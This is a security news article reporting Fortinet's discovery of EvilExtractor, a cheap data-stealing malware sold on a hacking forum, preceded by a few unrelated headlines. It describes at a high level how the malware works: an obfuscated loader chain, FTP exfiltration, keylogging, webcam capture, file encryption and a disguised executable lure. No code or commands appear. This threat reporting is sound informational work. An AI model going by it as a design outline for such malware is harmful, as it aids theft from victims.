- Dark Web Trio Sentenced - October 15, 2023
- Dymocks Data: Darknet Hit? - October 15, 2023
- Dark Web Forum Shows How to Synthesize Methamphetamine at Home - October 4, 2023
The powerful data-stealing tool has already been used in a number of cyberattacks.
Fortinet security researchers have reported the discovery of a powerful new malware named EvilExtractor. The vendor is positioning it as an all-in-one data-stealing tool. The malware costs only $39, which is very low for this type of software.
As the researchers noted, the malware consists of several modules. In addition to data-stealing functionality, the tool has an environment checker and is equipped with Anti-VirtualMachine to bypass security measures. The data theft modules work by using the attackers’ FTP server, to which the malware sends the stolen information. The executable file was an obfuscated Python-based program designed to run a .NET loader that uses a Base64-encoded PowerShell script to then run EvilExtractor.
EvilExtractor’s functionality is extensive. Among other things, the malware is capable of stealing system metadata, passwords, browser cookies, and is equipped with a keylogger. In addition, EvilExtractor can turn on the webcam secretly and take screenshots unnoticed. Especially dangerous is the function of encrypting files on the victim’s computer for further extortion.
Swiss army knife malware for mere pennies
Researchers are particularly concerned about EvilExtractor because of its extremely low price. A hacker nicknamed Kodex is selling the tool on the Cracked forum for just $39. It is unclear whether it is a one-time payment or a subscription. Nevertheless, even if the author of the software implies repeated payments, this amount is still very small compared to other tools of this type.
The software went on sale on October 22, 2022, and already in March 2023, several cyber attacks were seen spreading EvilExtractor in the wild (ITW) among users from Europe and the US. In addition, at least one phishing campaign was recorded with this malware involved. The attackers disguised EvilExtractor as a PDF document, which was in fact an executable file named “Account_Info.exe”.